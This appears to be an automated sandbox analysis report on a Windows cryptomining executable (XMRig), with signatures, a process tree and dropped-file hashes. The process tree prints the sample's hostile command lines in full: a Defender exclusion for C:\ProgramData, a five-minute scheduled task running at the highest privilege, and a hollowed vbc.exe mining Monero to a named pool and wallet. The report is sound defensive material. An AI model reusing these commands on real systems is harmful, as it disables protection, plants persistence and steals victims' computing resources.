Resubmissions
06/03/2024, 22:46
240306-2pzx2abc39 723/12/2022, 20:25
221223-y7mhwahb34 1023/12/2022, 20:11
221223-yx8ncscc9x 1023/12/2022, 20:03
221223-ys7v9sha97 10Analysis
-
max time kernel
652s -
max time network
654s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
23/12/2022, 20:11
Errors
General
-
Target
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
-
Size
2.1MB
-
MD5
55a350a007f6943a7e09f4abfdfa6979
-
SHA1
c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
-
SHA256
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
-
SHA512
707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
-
SSDEEP
49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 9 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.1MB
MD5a3d7148655137e92c28b33e48d088088
SHA1bc98804abf481e58c925a0810c519c6c5f2d3ac0
SHA2565b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f
SHA512ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373
-
Filesize
660B
MD51c5e1d0ff3381486370760b0f2eb656b
SHA1f9df6be8804ef611063f1ff277e323b1215372de
SHA256f424c891fbc7385e9826beed2dd8755aeac5495744b5de0a1e370891a7beaf7a
SHA51278f5fc40a185d04c9e4a02a3d1b10b4bd684c579a45a0d1e8f49f8dee9018ed7bc8875cbf21f98632f93ead667214a41904226ce54817b85caeeb4b0de54a743
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
Filesize
944B
MD585aee9feea947ab95485011d4b854b75
SHA14f54c5465be2b31cd886a33986915e81fd935711
SHA2567df497f5dd1b9c52edba01173b84b072922b2beb2fc6e45420c68fa01a5ac256
SHA5129f3902df4fd7a48bceb804ed0be67272328c519c1bd5ba6058541cdd6dd7fda3e25eba488d771aa4252a3a43fe54b72f3c98cd99ceaf58a7914dee86fd31db56
-
Filesize
944B
MD5a9293ef980c925abe33d940554ed8575
SHA19b6d85f2595f7fd4923f52b21ab7607279066969
SHA2568313a191aa9d11cce868d95ac9a9b1609275bfe93131fcb6e547b985b0242fbe
SHA5122003d90bb2bc89378ccaeb9c5edf76b2dfd93c80369d063e56141abb8d7fea6acee6a103874ab227bc1548437269c8e4ee5174bf482ecf3d66c38f3e0ba35d85
-
Filesize
944B
MD5a9451a6b9669d49bd90704dff21beb85
SHA15f93d2dec01a31e04fc90c28eb1c5ca62c6fff80
SHA256b2ff191507379930b97a212f869c3774c20b274e8fc9fcc96da5c154fb0e3056
SHA51206634cb578f6ce8d721e6306004082073fc224b91ceea37ef870df87b12b2d5f59e7d08b20b520787a1d13f3edbbb004197bf70f180f86dd7f401a5ad289ccb5
-
Filesize
944B
MD5ab24765a7393bd3cef8acbf0a617fba2
SHA1ef2c12a457a11f6204344afed09a39f4d3e803cb
SHA2563a03c7efabe880ae9f283b1cf373d3f09d07ab619028319b3599b643ae140d47
SHA512e16306674a8c89f54467d7fba3857e1e0bdf3729f5de9f4451520cfbddfa535c4d653dde6efcac38efd693e9b3e4965fcd08c559e720c372feca65050b46e355
-
Filesize
944B
MD5be67063c62a242565760a02a642a9f02
SHA1d1043a892b44d6676f71b568f578fff947266a19
SHA25656f158298dc5f781d6636a0b15d040f9cffb1d46cd11079aa40a26b662217f48
SHA51290d2cbd882ff8043412ad25e74df0cf6b71d6f3fbdfa6f1efa0efc8eed86a925606c7d2e967f112a34d3f0e04f01a396898508571400dcf7e6fd69e78f406638
-
Filesize
944B
MD5be67063c62a242565760a02a642a9f02
SHA1d1043a892b44d6676f71b568f578fff947266a19
SHA25656f158298dc5f781d6636a0b15d040f9cffb1d46cd11079aa40a26b662217f48
SHA51290d2cbd882ff8043412ad25e74df0cf6b71d6f3fbdfa6f1efa0efc8eed86a925606c7d2e967f112a34d3f0e04f01a396898508571400dcf7e6fd69e78f406638
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
260KB
-
Filesize
680KB
-
Filesize
632KB
-
Filesize
72KB
-
Filesize
2.5MB
-
Filesize
2.5MB
-
Filesize
756KB
-
Filesize
2.5MB
-
Filesize
1.6MB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
156KB
-
Filesize
680KB
-
Filesize
632KB
-
Filesize
72KB
-
Filesize
756KB
-
Filesize
1.6MB
-
Filesize
2.5MB
-
Filesize
172KB
-
Filesize
260KB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
756KB
-
Filesize
680KB
-
Filesize
632KB
-
Filesize
72KB
-
Filesize
2.5MB
-
Filesize
260KB
-
Filesize
1.6MB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
172KB
-
Filesize
260KB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
72KB
-
Filesize
1.6MB
-
Filesize
2.5MB
-
Filesize
260KB
-
Filesize
10.8MB
-
Filesize
156KB
-
Filesize
680KB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
632KB
-
Filesize
1.3MB
-
Filesize
2.5MB
-
Filesize
172KB
-
Filesize
756KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
632KB
-
Filesize
680KB
-
Filesize
72KB
-
Filesize
2.5MB
-
Filesize
756KB
-
Filesize
260KB
-
Filesize
260KB
-
Filesize
2.5MB
-
Filesize
1.6MB
-
Filesize
172KB
-
Filesize
1.3MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
172KB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
236KB
-
Filesize
428KB
-
Filesize
1.0MB
-
Filesize
212KB
-
Filesize
632KB
-
Filesize
260KB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
72KB
-
Filesize
756KB
-
Filesize
1.6MB
-
Filesize
10.8MB
-
Filesize
680KB
-
Filesize
2.5MB
-
Filesize
2.5MB
-
Filesize
1.3MB
-
Filesize
156KB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
156KB
-
Filesize
72KB
-
Filesize
172KB
-
Filesize
1.6MB
-
Filesize
260KB
-
Filesize
10.8MB
-
Filesize
2.5MB
-
Filesize
632KB
-
Filesize
2.5MB
-
Filesize
680KB
-
Filesize
756KB